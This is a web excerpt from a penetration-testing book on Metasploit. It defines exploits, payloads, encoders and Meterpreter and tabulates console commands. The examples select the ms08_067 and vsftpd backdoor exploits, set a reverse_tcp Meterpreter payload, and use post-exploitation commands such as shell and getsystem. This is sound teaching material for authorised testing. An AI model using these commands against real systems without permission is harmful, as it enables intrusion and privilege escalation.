Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Arrow left icon
Explore Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Free Learning
Arrow right icon
Arrow up icon
GO TO TOP
Mastering Metasploit

You're reading from   Mastering Metasploit Take your penetration testing and IT security skills to a whole new level with the secrets of Metasploit

Arrow left icon
Product type Paperback
Published in May 2018
Publisher Packt
ISBN-13 9781788990615
Length 492 pages
Edition 3rd Edition
Languages
Arrow right icon
Author (1):
Arrow left icon
Nipun Jaswal Nipun Jaswal
Author Profile Icon Nipun Jaswal
Nipun Jaswal
Arrow right icon
View More author details
Toc

Table of Contents (14) Chapters Close

Preface 1. Approaching a Penetration Test Using Metasploit FREE CHAPTER 2. Reinventing Metasploit 3. The Exploit Formulation Process 4. Porting Exploits 5. Testing Services with Metasploit 6. Virtual Test Grounds and Staging 7. Client-Side Exploitation 8. Metasploit Extended 9. Evasion with Metasploit 10. Metasploit for Secret Agents 11. Visualizing with Armitage 12. Tips and Tricks 13. Other Books You May Enjoy

Conducting a penetration test with Metasploit

After setting up Kali Linux, we are now ready to perform our first penetration test with Metasploit. However, before we start the test, let's recall some of the essential functions and terminologies used in the Metasploit framework.

Recalling the basics of Metasploit

After we run Metasploit, we can list all the useful commands available in the framework by typing help or ? in the Metasploit console. Let's recall the basic terms used in Metasploit, which are as follows:

  • Exploits: This is a piece of code that, when executed, will exploit the vulnerability of the target.
  • Payload: This is a piece of code that runs at the target after successful exploitation. It defines the actions we want to perform on the target system.
  • Auxiliary: These are modules that provide additional functionalities such as scanning, fuzzing, sniffing, and much more.
  • Encoders: Encoders are used to obfuscate modules to avoid detection by a protection mechanism such as an antivirus or a firewall.
  • Meterpreter: Meterpreter is a payload that uses in-memory DLL injection stagers. It provides a variety of functions to perform at the target, which makes it a popular choice.

Now, let's recall some of the basic commands of Metasploit that we will use in this chapter. Let's see what they are supposed to do:

Command

Usage

Example

use [Auxiliary/Exploit/Payload/Encoder]

To select a particular module to start working with

msf>use exploit/unix/ftp/vsftpd_234_backdoor msf>use auxiliary/scanner/portscan/tcp

show [exploits/payloads/encoder/auxiliary/options]

To see the list of available modules of a particular type

msf>show payloads msf> show options

set [options/payload]

To set a value to a particular object

msf>set payload windows/meterpreter/reverse_tcp msf>set LHOST 192.168.10.118 msf> set RHOST 192.168.10.112 msf> set LPORT 4444 msf> set RPORT 8080

setg [options/payload]

To set a value to a particular object globally, so the values do not change when a module is switched on

msf>setg RHOST 192.168.10.112

run

To launch an auxiliary module after all the required options are set

msf>run

exploit

To launch an exploit

msf>exploit

back

To unselect a module and move back

msf(ms08_067_netapi)>back msf>

Info

To list the information related to a particular exploit/module/auxiliary

msf>info exploit/windows/smb/ms08_067_netapi msf(ms08_067_netapi)>info

Search

To find a particular module

msf>search hfs

check

To check whether a particular target is vulnerable to the exploit or not

msf>check

Sessions

To list the available sessions

msf>sessions [session number]

Let's have a look at the basic Meterpreter commands as well:

Meterpreter commands

Usage

Example

sysinfo

To list system information of the compromised host

meterpreter>sysinfo

ifconfig

To list the network interfaces on the compromised host

meterpreter>ifconfig meterpreter>ipconfig (Windows)

arp

List of IP and MAC addresses of hosts connected to the target

meterpreter>arp

background

To send an active session to the background

meterpreter>background

shell

To drop a cmd shell on the target

meterpreter>shell

getuid

To get the current user's details

meterpreter>getuid

getsystem

To escalate privileges and gain SYSTEM access

meterpreter>getsystem

getpid

To gain the process ID of the meterpreter access

meterpreter>getpid

ps

To list all the processes running on the target

meterpreter>ps

Since we have now recalled the basics of Metasploit commands, let's have a look at the benefits of using Metasploit over traditional tools and scripts in the next section.

If you are using Metasploit for the very first time, refer to https://www.offensive-security.com/metasploit-unleashed/msfconsole-commands/ for more information on basic commands.
You have been reading a chapter from
Mastering Metasploit - Third Edition
Published in: May 2018
Publisher: Packt
ISBN-13: 9781788990615
Register for a free Packt account to unlock a world of extra content!
A free Packt account unlocks extra newsletters, articles, discounted offers, and much more. Start advancing your knowledge today.
Unlock this book and the full library FREE for 7 days
Get unlimited access to 7000+ expert-authored eBooks and videos courses covering every tech area you can think of
Renews at $19.99/month. Cancel anytime
Banner background image